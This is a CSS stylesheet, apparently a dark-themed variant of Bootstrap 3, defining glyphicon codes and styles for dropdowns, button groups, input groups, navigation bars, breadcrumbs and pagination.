.glyphicon-plane:before {
content: "\e108";
}
.glyphicon-random:before {
content: "\e110";
}
.glyphicon-comment:before {
content: "\e111";
}
.glyphicon-magnet:before {
content: "\e112";
}
.glyphicon-chevron-up:before {
content: "\e113";
}
.glyphicon-chevron-down:before {
content: "\e114";
}
.glyphicon-retweet:before {
content: "\e115";
}
.glyphicon-shopping-cart:before {
content: "\e116";
}
.glyphicon-folder-close:before {
content: "\e117";
}
.glyphicon-folder-open:before {
content: "\e118";
}
.glyphicon-resize-vertical:before {
content: "\e119";
}
.glyphicon-resize-horizontal:before {
content: "\e120";
}
.glyphicon-hdd:before {
content: "\e121";
}
.glyphicon-bullhorn:before {
content: "\e122";
}
.glyphicon-certificate:before {
content: "\e124";
}
.glyphicon-thumbs-up:before {
content: "\e125";
}
.glyphicon-thumbs-down:before {
content: "\e126";
}
.glyphicon-hand-right:before {
content: "\e127";
}
.glyphicon-hand-left:before {
content: "\e128";
}
.glyphicon-hand-up:before {
content: "\e129";
}
.glyphicon-hand-down:before {
content: "\e130";
}
.glyphicon-circle-arrow-right:before {
content: "\e131";
}
.glyphicon-circle-arrow-left:before {
content: "\e132";
}
.glyphicon-circle-arrow-up:before {
content: "\e133";
}
.glyphicon-circle-arrow-down:before {
content: "\e134";
}
.glyphicon-globe:before {
content: "\e135";
}
.glyphicon-tasks:before {
content: "\e137";
}
.glyphicon-filter:before {
content: "\e138";
}
.glyphicon-fullscreen:before {
content: "\e140";
}
.glyphicon-dashboard:before {
content: "\e141";
}
.glyphicon-heart-empty:before {
content: "\e143";
}
.glyphicon-link:before {
content: "\e144";
}
.glyphicon-phone:before {
content: "\e145";
}
.glyphicon-usd:before {
content: "\e148";
}
.glyphicon-gbp:before {
content: "\e149";
}
.glyphicon-sort:before {
content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
content: "\e152";
}
.glyphicon-sort-by-order:before {
content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
content: "\e154";
}
.glyphicon-sort-by-attributes:before {
content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
content: "\e156";
}
.glyphicon-unchecked:before {
content: "\e157";
}
.glyphicon-expand:before {
content: "\e158";
}
.glyphicon-collapse-down:before {
content: "\e159";
}
.glyphicon-collapse-up:before {
content: "\e160";
}
.glyphicon-log-in:before {
content: "\e161";
}
.glyphicon-flash:before {
content: "\e162";
}
.glyphicon-log-out:before {
content: "\e163";
}
.glyphicon-new-window:before {
content: "\e164";
}
.glyphicon-record:before {
content: "\e165";
}
.glyphicon-save:before {
content: "\e166";
}
.glyphicon-open:before {
content: "\e167";
}
.glyphicon-saved:before {
content: "\e168";
}
.glyphicon-import:before {
content: "\e169";
}
.glyphicon-export:before {
content: "\e170";
}
.glyphicon-send:before {
content: "\e171";
}
.glyphicon-floppy-disk:before {
content: "\e172";
}
.glyphicon-floppy-saved:before {
content: "\e173";
}
.glyphicon-floppy-remove:before {
content: "\e174";
}
.glyphicon-floppy-save:before {
content: "\e175";
}
.glyphicon-floppy-open:before {
content: "\e176";
}
.glyphicon-credit-card:before {
content: "\e177";
}
.glyphicon-transfer:before {
content: "\e178";
}
.glyphicon-cutlery:before {
content: "\e179";
}
.glyphicon-header:before {
content: "\e180";
}
.glyphicon-compressed:before {
content: "\e181";
}
.glyphicon-earphone:before {
content: "\e182";
}
.glyphicon-phone-alt:before {
content: "\e183";
}
.glyphicon-tower:before {
content: "\e184";
}
.glyphicon-stats:before {
content: "\e185";
}
.glyphicon-sd-video:before {
content: "\e186";
}
.glyphicon-hd-video:before {
content: "\e187";
}
.glyphicon-subtitles:before {
content: "\e188";
}
.glyphicon-sound-stereo:before {
content: "\e189";
}
.glyphicon-sound-dolby:before {
content: "\e190";
}
.glyphicon-sound-5-1:before {
content: "\e191";
}
.glyphicon-sound-6-1:before {
content: "\e192";
}
.glyphicon-sound-7-1:before {
content: "\e193";
}
.glyphicon-copyright-mark:before {
content: "\e194";
}
.glyphicon-registration-mark:before {
content: "\e195";
}
.glyphicon-cloud-download:before {
content: "\e197";
}
.glyphicon-cloud-upload:before {
content: "\e198";
}
.glyphicon-tree-conifer:before {
content: "\e199";
}
.glyphicon-tree-deciduous:before {
content: "\e200";
}
.glyphicon-briefcase:before {
content: "\1f4bc";
}
.glyphicon-calendar:before {
content: "\1f4c5";
}
.glyphicon-pushpin:before {
content: "\1f4cc";
}
.glyphicon-paperclip:before {
content: "\1f4ce";
}
.glyphicon-camera:before {
content: "\1f4f7";
}
.glyphicon-lock:before {
content: "\1f512";
}
.glyphicon-bell:before {
content: "\1f514";
}
.glyphicon-bookmark:before {
content: "\1f516";
}
.glyphicon-fire:before {
content: "\1f525";
}
.glyphicon-wrench:before {
content: "\1f527";
}
.caret {
display: inline-block;
width: 0;
height: 0;
margin-left: 2px;
vertical-align: middle;
border-top: 4px solid #000000;
border-right: 4px solid transparent;
border-bottom: 0 dotted;
border-left: 4px solid transparent;
content: "";
}
.dropdown {
position: relative;
}
.dropdown-toggle:focus {
outline: 0;
}
.dropdown-menu {
position: absolute;
top: 100%;
left: 0;
z-index: 1000;
display: none;
float: left;
min-width: 160px;
padding: 5px 0;
margin: 2px 0 0;
font-size: 14px;
list-style: none;
background-color: #000000;
border: 1px solid #cccccc;
border: 1px solid rgba(0, 0, 0, 0.15);
border-radius: 4px;
-webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
background-clip: padding-box;
}
.dropdown-menu.pull-right {
right: 0;
left: auto;
}
.dropdown-menu .divider {
height: 1px;
margin: 9px 0;
overflow: hidden;
background-color: #000000;
}
.dropdown-menu > li > a {
display: block;
padding: 3px 20px;
clear: both;
font-weight: normal;
line-height: 1.428571429;
color: #333333;
white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
color: #ffffff;
text-decoration: none;
background-color: #000000;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
color: #ffffff;
text-decoration: none;
background-color: #000000;
outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
text-decoration: none;
cursor: not-allowed;
background-color: transparent;
background-image: none;
filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
}
.open > .dropdown-menu {
display: block;
}
.open > a {
outline: 0;
}
.dropdown-header {
display: block;
padding: 3px 20px;
font-size: 12px;
line-height: 1.428571429;
color: #999999;
}
.dropdown-backdrop {
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 990;
}
.pull-right > .dropdown-menu {
right: 0;
left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
border-top: 0 dotted;
border-bottom: 4px solid #000000;
content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
top: auto;
bottom: 100%;
margin-bottom: 1px;
}
@media (min-width: 768px) {
.navbar-right .dropdown-menu {
right: 0;
left: auto;
}
}
.btn-default .caret {
border-top-color: #333333;
}
.btn-primary .caret,
.btn-success .caret,
.btn-warning .caret,
.btn-danger .caret,
.btn-info .caret {
border-top-color: #fff;
}
.dropup .btn-default .caret {
border-bottom-color: #333333;
}
.dropup .btn-primary .caret,
.dropup .btn-success .caret,
.dropup .btn-warning .caret,
.dropup .btn-danger .caret,
.dropup .btn-info .caret {
border-bottom-color: #fff;
}
.btn-group,
.btn-group-vertical {
position: relative;
display: inline-block;
vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
position: relative;
float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
z-index: 2;
}
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus {
outline: none;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
margin-left: -1px;
}
.btn-toolbar:before,
.btn-toolbar:after {
display: table;
content: " ";
}
.btn-toolbar:after {
clear: both;
}
.btn-toolbar:before,
.btn-toolbar:after {
display: table;
content: " ";
}
.btn-toolbar:after {
clear: both;
}
.btn-toolbar .btn-group {
float: left;
}
.btn-toolbar > .btn + .btn,
.btn-toolbar > .btn-group + .btn,
.btn-toolbar > .btn + .btn-group,
.btn-toolbar > .btn-group + .btn-group {
margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
border-radius: 0;
}
.btn-group > .btn:first-child {
margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
border-bottom-left-radius: 0;
border-top-left-radius: 0;
}
.btn-group > .btn-group {
float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
border-radius: 0;
}
.btn-group > .btn-group:first-child > .btn:last-child,
.btn-group > .btn-group:first-child > .dropdown-toggle {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.btn-group > .btn-group:last-child > .btn:first-child {
border-bottom-left-radius: 0;
border-top-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
outline: 0;
}
.btn-group-xs > .btn {
padding: 5px 10px;
padding: 1px 5px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-group-sm > .btn {
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
.btn-group-lg > .btn {
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
.btn-group > .btn + .dropdown-toggle {
padding-right: 8px;
padding-left: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
padding-right: 12px;
padding-left: 12px;
}
.btn-group.open .dropdown-toggle {
-webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn .caret {
margin-left: 0;
}
.btn-lg .caret {
border-width: 5px 5px 0;
border-bottom-width: 0;
}
.dropup .btn-lg .caret {
border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group {
display: block;
float: none;
width: 100%;
max-width: 100%;
}
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after {
display: table;
content: " ";
}
.btn-group-vertical > .btn-group:after {
clear: both;
}
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after {
display: table;
content: " ";
}
.btn-group-vertical > .btn-group:after {
clear: both;
}
.btn-group-vertical > .btn-group > .btn {
float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
margin-top: -1px;
margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
border-top-right-radius: 4px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
border-top-right-radius: 0;
border-bottom-left-radius: 4px;
border-top-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child > .btn:last-child,
.btn-group-vertical > .btn-group:first-child > .dropdown-toggle {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child > .btn:first-child {
border-top-right-radius: 0;
border-top-left-radius: 0;
}
.btn-group-justified {
display: table;
width: 100%;
border-collapse: separate;
table-layout: fixed;
}
.btn-group-justified .btn {
display: table-cell;
float: none;
width: 1%;
}
[data-toggle="buttons"] > .btn > input[type="radio"],
[data-toggle="buttons"] > .btn > input[type="checkbox"] {
display: none;
}
.input-group {
position: relative;
display: table;
border-collapse: separate;
}
.input-group.col {
float: none;
padding-right: 0;
padding-left: 0;
}
.input-group .form-control {
width: 100%;
margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
height: 45px;
padding: 10px 16px;
font-size: 18px;
line-height: 1.33;
border-radius: 6px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
height: 45px;
line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn {
height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
height: 30px;
padding: 5px 10px;
font-size: 12px;
line-height: 1.5;
border-radius: 3px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
height: 30px;
line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn {
height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
border-radius: 0;
}
.input-group-addon,
.input-group-btn {
width: 1%;
white-space: nowrap;
vertical-align: middle;
}
.input-group-addon {
padding: 6px 12px;
font-size: 14px;
font-weight: normal;
line-height: 1;
text-align: center;
background-color: #eeeeee;
border: 1px solid #cccccc;
border-radius: 4px;
}
.input-group-addon.input-sm {
padding: 5px 10px;
font-size: 12px;
border-radius: 3px;
}
.input-group-addon.input-lg {
padding: 10px 16px;
font-size: 18px;
border-radius: 6px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle) {
border-top-right-radius: 0;
border-bottom-right-radius: 0;
}
.input-group-addon:first-child {
border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child) {
border-bottom-left-radius: 0;
border-top-left-radius: 0;
}
.input-group-addon:last-child {
border-left: 0;
}
.input-group-btn {
position: relative;
white-space: nowrap;
}
.input-group-btn > .btn {
position: relative;
}
.input-group-btn > .btn + .btn {
margin-left: -4px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:active {
z-index: 2;
}
.nav {
padding-left: 0;
margin-bottom: 0;
list-style: none;
}
.nav:before,
.nav:after {
display: table;
content: " ";
}
.nav:after {
clear: both;
}
.nav:before,
.nav:after {
display: table;
content: " ";
}
.nav:after {
clear: both;
}
.nav > li {
position: relative;
display: block;
}
.nav > li > a {
position: relative;
display: block;
padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
text-decoration: none;
background-color: #eeeeee;
}
.nav > li.disabled > a {
color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
color: #999999;
text-decoration: none;
cursor: not-allowed;
background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
background-color: #eeeeee;
border-color: #FfFfFf;
}
.nav .nav-divider {
height: 1px;
margin: 9px 0;
overflow: hidden;
background-color: #000000;
}
.nav > li > a > img {
max-width: none;
}
.nav-tabs {
border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
float: left;
margin-bottom: -1px;
}
.nav-tabs > li > a {
margin-right: 2px;
line-height: 1.428571429;
border: 1px solid transparent;
border-radius: 4px 4px 0 0;
}
.nav-tabs > li > a:hover {
border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
color: #FFFFFF;
cursor: default;
background-color: #000000;
border: 1px solid #dddddd;
border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
width: 100%;
border-bottom: 0;
}
.nav-tabs.nav-justified > li {
float: none;
}
.nav-tabs.nav-justified > li > a {
text-align: center;
}
@media (min-width: 768px) {
.nav-tabs.nav-justified > li {
display: table-cell;
width: 1%;
}
}
.nav-tabs.nav-justified > li > a {
margin-right: 0;
border-bottom: 1px solid #dddddd;
}
.nav-tabs.nav-justified > .active > a {
border-bottom-color: #ffffff;
}
.nav-pills > li {
float: left;
}
.nav-pills > li > a {
border-radius: 5px;
}
.nav-pills > li + li {
margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
color: #ffffff;
background-color: #FfFfFf;
}
.nav-stacked > li {
float: none;
}
.nav-stacked > li + li {
margin-top: 2px;
margin-left: 0;
}
.nav-justified {
width: 100%;
}
.nav-justified > li {
float: none;
}
.nav-justified > li > a {
text-align: center;
}
@media (min-width: 768px) {
.nav-justified > li {
display: table-cell;
width: 1%;
}
}
.nav-tabs-justified {
border-bottom: 0;
}
.nav-tabs-justified > li > a {
margin-right: 0;
border-bottom: 1px solid #dddddd;
}
.nav-tabs-justified > .active > a {
border-bottom-color: #ffffff;
}
.tabbable:before,
.tabbable:after {
display: table;
content: " ";
}
.tabbable:after {
clear: both;
}
.tabbable:before,
.tabbable:after {
display: table;
content: " ";
}
.tabbable:after {
clear: both;
}
.tab-content > .tab-pane,
.pill-content > .pill-pane {
display: none;
}
.tab-content > .active,
.pill-content > .active {
display: block;
}
.nav .caret {
border-top-color: #FfFfFf;
border-bottom-color: #FfFfFf;
}
.nav a:hover .caret {
border-top-color: #2a6496;
border-bottom-color: #2a6496;
}
.nav-tabs .dropdown-menu {
margin-top: -1px;
border-top-right-radius: 0;
border-top-left-radius: 0;
}
.navbar {
position: relative;
z-index: 1000;
min-height: 50px;
border: 1px solid transparent;
}
.navbar:before,
.navbar:after {
display: table;
content: " ";
}
.navbar:after {
clear: both;
}
.navbar:before,
.navbar:after {
display: table;
content: " ";
}
.navbar:after {
clear: both;
}
@media (min-width: 768px) {
.navbar {
}
}
.navbar-header:before,
.navbar-header:after {
display: table;
content: " ";
}
.navbar-header:after {
clear: both;
}
.navbar-header:before,
.navbar-header:after {
display: table;
content: " ";
}
.navbar-header:after {
clear: both;
}
@media (min-width: 768px) {
.navbar-header {
float: left;
}
}
.navbar-collapse {
max-height: 340px;
padding-right: 15px;
padding-left: 15px;
overflow-x: visible;
border-top: 1px solid transparent;
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
-webkit-overflow-scrolling: touch;
}
.navbar-collapse:before,
.navbar-collapse:after {
display: table;
content: " ";
}
.navbar-collapse:after {
clear: both;
}
.navbar-collapse:before,
.navbar-collapse:after {
display: table;
content: " ";
}
.navbar-collapse:after {
clear: both;
}
.navbar-collapse.in {
overflow-y: auto;
}
@media (min-width: 768px) {
.navbar-collapse {
width: auto;
border-top: 0;
box-shadow: none;
}
.navbar-collapse.collapse {
display: block !important;
height: auto !important;
padding-bottom: 0;
overflow: visible !important;
}
.navbar-collapse.in {
overflow-y: visible;
}
.navbar-collapse .navbar-nav.navbar-left:first-child {
margin-left: -15px;
}
.navbar-collapse .navbar-nav.navbar-right:last-child {
margin-right: -15px;
}
.navbar-collapse .navbar-text:last-child {
margin-right: 0;
}
}
.container > .navbar-header,
.container > .navbar-collapse {
margin-right: -15px;
margin-left: -15px;
}
@media (min-width: 768px) {
.container > .navbar-header,
.container > .navbar-collapse {
margin-right: 0;
margin-left: 0;
}
}
.navbar-static-top {
border-width: 0 0 1px;
}
@media (min-width: 768px) {
.navbar-static-top {
}
}
.navbar-fixed-top,
.navbar-fixed-bottom {
position: fixed;
right: 0;
left: 0;
border-width: 0 0 1px;
}
@media (min-width: 768px) {
.navbar-fixed-top,
.navbar-fixed-bottom {
border-radius: 0;
}
}
.navbar-fixed-top {
top: 0;
z-index: 1030;
}
.navbar-fixed-bottom {
bottom: 0;
margin-bottom: 0;
}
.navbar-brand {
float: left;
padding: 3px 3px;
font-size: 18px;
line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
text-decoration: none;
}
@media (min-width: 768px) {
.navbar > .container .navbar-brand {
margin-left: -15px;
}
}
.navbar-toggle {
position: relative;
float: right;
padding: 9px 10px;
margin-top: 8px;
margin-right: 15px;
margin-bottom: 8px;
background-color: transparent;
border: 1px solid transparent;
border-radius: 4px;
}
.navbar-toggle .icon-bar {
display: block;
width: 22px;
height: 2px;
border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
margin-top: 4px;
}
@media (min-width: 768px) {
.navbar-toggle {
display: none;
}
}
.navbar-nav {
margin: 7.5px -15px;
}
.navbar-nav > li > a {
padding-top: 10px;
padding-bottom: 10px;
line-height: 20px;
}
@media (max-width: 767px) {
.navbar-nav .open .dropdown-menu {
position: static;
float: none;
width: auto;
margin-top: 0;
background-color: transparent;
border: 0;
box-shadow: none;
}
.navbar-nav .open .dropdown-menu > li > a,
.navbar-nav .open .dropdown-menu .dropdown-header {
padding: 5px 15px 5px 25px;
}
.navbar-nav .open .dropdown-menu > li > a {
line-height: 20px;
}
.navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-nav .open .dropdown-menu > li > a:focus {
background-image: none;
}
}
@media (min-width: 768px) {
.navbar-nav {
float: left;
margin: 0;
}
.navbar-nav > li {
float: left;
}
.navbar-nav > li > a {
padding-top: 15px;
padding-bottom: 15px;
}
}
@media (min-width: 768px) {
.navbar-left {
float: left !important;
}
.navbar-right {
float: right !important;
}
}
.navbar-form {
padding: 10px 15px;
margin-top: 8px;
margin-right: -15px;
margin-bottom: 8px;
margin-left: -15px;
border-top: 1px solid transparent;
border-bottom: 1px solid transparent;
-webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
}
@media (min-width: 768px) {
.navbar-form .form-group {
display: inline-block;
margin-bottom: 0;
vertical-align: middle;
}
.navbar-form .form-control {
display: inline-block;
}
.navbar-form .radio,
.navbar-form .checkbox {
display: inline-block;
padding-left: 0;
margin-top: 0;
margin-bottom: 0;
}
.navbar-form .radio input[type="radio"],
.navbar-form .checkbox input[type="checkbox"] {
float: none;
margin-left: 0;
}
}
@media (max-width: 767px) {
.navbar-form .form-group {
margin-bottom: 5px;
}
}
@media (min-width: 768px) {
.navbar-form {
width: auto;
padding-top: 0;
padding-bottom: 0;
margin-right: 0;
margin-left: 0;
border: 0;
-webkit-box-shadow: none;
box-shadow: none;
}
}
.navbar-nav > li > .dropdown-menu {
margin-top: 0;
border-top-right-radius: 0;
border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.navbar-nav.pull-right > li > .dropdown-menu,
.navbar-nav > li > .dropdown-menu.pull-right {
right: 0;
left: auto;
}
.navbar-btn {
margin-top: 8px;
margin-bottom: 8px;
}
.navbar-text {
float: left;
margin-top: 15px;
margin-bottom: 15px;
}
@media (min-width: 768px) {
.navbar-text {
margin-right: 15px;
margin-left: 15px;
}
}
.navbar-default {
background-color: #000000;
border-color: #e7e7e7;
}
.navbar-default .navbar-brand {
color: #777777;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
color: #5e5e5e;
background-color: transparent;
}
.navbar-default .navbar-text {
color: #999999;
}
.navbar-default .navbar-nav > li > a {
color: #999999;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
color: #FFFFFF;
background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
color: #555555;
background-color: #e7e7e7;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
color: #cccccc;
background-color: transparent;
}
.navbar-default .navbar-toggle {
border-color: #dddddd;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
background-color: #dddddd;
}
.navbar-default .navbar-toggle .icon-bar {
background-color: #cccccc;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
border-color: #e6e6e6;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
border-top-color: #333333;
border-bottom-color: #333333;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
color: #555555;
background-color: #e7e7e7;
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
border-top-color: #555555;
border-bottom-color: #555555;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
border-top-color: #777777;
border-bottom-color: #777777;
}
@media (max-width: 767px) {
.navbar-default .navbar-nav .open .dropdown-menu > li > a {
color: #777777;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
color: #333333;
background-color: transparent;
}
.navbar-default .navbar-nav .open .dropdown-menu > .active > a,
.navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
color: #555555;
background-color: #e7e7e7;
}
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
.navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
color: #cccccc;
background-color: transparent;
}
}
.navbar-default .navbar-link {
color: #777777;
}
.navbar-default .navbar-link:hover {
color: #333333;
}
.navbar-inverse {
background-color: #000000;
border-color: #080808;
}
.navbar-inverse .navbar-brand {
color: #FFFFFF;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
color: #ffffff;
background-color: transparent;
}
.navbar-inverse .navbar-text {
color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
color: #ffffff;
background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
color: #ffffff;
background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
color: #444444;
background-color: transparent;
}
.navbar-inverse .navbar-toggle {
border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
border-color: #101010;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
color: #ffffff;
background-color: #080808;
}
.navbar-inverse .navbar-nav > .dropdown > a:hover .caret {
border-top-color: #ffffff;
border-bottom-color: #ffffff;
}
.navbar-inverse .navbar-nav > .dropdown > a .caret {
border-top-color: #999999;
border-bottom-color: #999999;
}
.navbar-inverse .navbar-nav > .open > a .caret,
.navbar-inverse .navbar-nav > .open > a:hover .caret,
.navbar-inverse .navbar-nav > .open > a:focus .caret {
border-top-color: #ffffff;
border-bottom-color: #ffffff;
}
@media (max-width: 767px) {
.navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
border-color: #080808;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
color: #999999;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
color: #ffffff;
background-color: transparent;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
color: #ffffff;
background-color: #080808;
}
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
.navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
color: #FFFFFF;
background-color: transparent;
}
}
.navbar-inverse .navbar-link {
color: #999999;
}
.navbar-inverse .navbar-link:hover {
color: #ffffff;
}
.breadcrumb {
padding: 8px 15px;
margin-bottom: 20px;
list-style: none;
background-color: #f5f5f5;
border-radius: 4px;
}
.breadcrumb > li {
display: inline-block;
}
.breadcrumb > li + li:before {
padding: 0 5px;
color: #cccccc;
content: "/\00a0";
}
.breadcrumb > .active {
color: #999999;
}
.pagination {
display: inline-block;
padding-left: 0;
margin: 20px 0;
border-radius: 4px;
}
.pagination > li {
display: inline;
}
.pagination > li > a,
.pagination > li > span {
position: relative;
float: left;
padding: 6px 12px;
margin-left: -1px;
line-height: 1.428571429;
text-decoration: none;
background-color: #ffffff;
border: 1px solid #dddddd;
}
